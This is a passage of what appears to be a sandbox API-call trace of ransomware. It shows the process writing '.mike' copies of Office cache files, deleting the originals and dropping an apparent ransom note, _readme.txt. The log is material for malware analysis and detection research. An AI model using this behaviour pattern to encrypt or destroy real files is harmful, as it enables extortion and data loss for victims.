Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.mike", lpFilePart=0x0) returned 0x55 [0039.756] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.756] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.mike", lpFilePart=0x0) returned 0x55 [0039.756] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.757] GetFileType (hFile=0x264) returned 0x1 [0039.757] GetFileType (hFile=0x264) returned 0x1 [0039.757] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0039.757] WriteFile (in: hFile=0x264, lpBuffer=0x21b97b8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21b97b8*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0039.758] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x21b9270 | out: lpFileInformation=0x21b9270*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa)) returned 1 [0039.758] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0039.758] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.758] GetFileType (hFile=0x264) returned 0x1 [0039.758] GetFileType (hFile=0x264) returned 0x1 [0039.759] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0039.759] ReadFile (in: hFile=0x264, lpBuffer=0x21ba900, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x21ba900*, lpNumberOfBytesRead=0x2af110*=0x5aa, lpOverlapped=0x0) returned 1 [0039.761] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.mike", lpFilePart=0x0) returned 0x55 [0039.761] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.761] GetFileType (hFile=0x264) returned 0x1 [0039.761] GetFileType (hFile=0x264) returned 0x1 [0039.761] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0039.761] WriteFile (in: hFile=0x264, lpBuffer=0x21bf9d0*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21bf9d0*, lpNumberOfBytesWritten=0x2af104*=0x5b0, lpOverlapped=0x0) returned 1 [0039.762] CloseHandle (hObject=0x264) returned 1 [0039.762] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.mike", lpFilePart=0x0) returned 0x55 [0039.762] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.763] GetFileType (hFile=0x264) returned 0x1 [0039.763] GetFileType (hFile=0x264) returned 0x1 [0039.764] WriteFile (in: hFile=0x264, lpBuffer=0x21c2c18*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x21c2c18*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0039.764] CloseHandle (hObject=0x264) returned 1 [0039.764] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0039.764] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.mike", lpFilePart=0x0) returned 0x55 [0039.764] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1e6cf80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe1e6cf80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe1e6cf80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7d0)) returned 1 [0039.765] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0039.765] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.mike", lpFilePart=0x0) returned 0x55 [0039.765] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21c4404 | out: lpFileInformation=0x21c4404*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1e6cf80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe1e6cf80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe1e6cf80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7d0)) returned 1 [0039.765] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0039.765] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", dwFileAttributes=0x80) returned 1 [0039.765] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0039.765] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml")) returned 1 [0039.766] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0039.766] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0039.766] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0039.766] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0039.766] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0039.766] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0039.766] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0039.769] GetFileType (hFile=0x264) returned 0x1 [0039.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0039.769] GetFileType (hFile=0x264) returned 0x1 [0039.769] WriteFile (in: hFile=0x264, lpBuffer=0x21c6158*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x21c6158*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0039.770] CloseHandle (hObject=0x264) returned 1 [0039.770] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpFilePart=0x0) returned 0x48 [0039.770] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.771] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.771] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.771] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0039.771] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.771] GetFileType (hFile=0x264) returned 0x1 [0039.771] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0039.771] GetFileType (hFile=0x264) returned 0x1 [0039.771] CloseHandle (hObject=0x264) returned 1 [0039.771] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.771] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.771] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0039.771] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0039.771] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0039.771] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0039.771] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0039.771] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21ca2d0 | out: lpFileInformation=0x21ca2d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e)) returned 1 [0039.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0039.772] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0039.772] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21ca5ec | out: lpFileInformation=0x21ca5ec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e)) returned 1 [0039.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0039.772] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.772] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0039.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0039.772] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0039.772] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.772] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.772] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.772] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0039.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0039.773] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0039.773] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0039.773] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0039.773] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.773] GetFileType (hFile=0x264) returned 0x1 [0039.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0039.773] GetFileType (hFile=0x264) returned 0x1 [0039.773] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0039.773] WriteFile (in: hFile=0x264, lpBuffer=0x21cb468*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21cb468*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0039.774] CloseHandle (hObject=0x264) returned 1 [0039.774] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0039.774] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21caf70 | out: lpFileInformation=0x21caf70*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e)) returned 1 [0039.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0039.774] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.774] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0039.775] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.775] GetFileType (hFile=0x264) returned 0x1 [0039.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0039.775] GetFileType (hFile=0x264) returned 0x1 [0039.775] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0039.775] ReadFile (in: hFile=0x264, lpBuffer=0x21cc590, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x21cc590*, lpNumberOfBytesRead=0x2af110*=0x75e, lpOverlapped=0x0) returned 1 [0039.814] CloseHandle (hObject=0x264) returned 1 [0039.814] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, 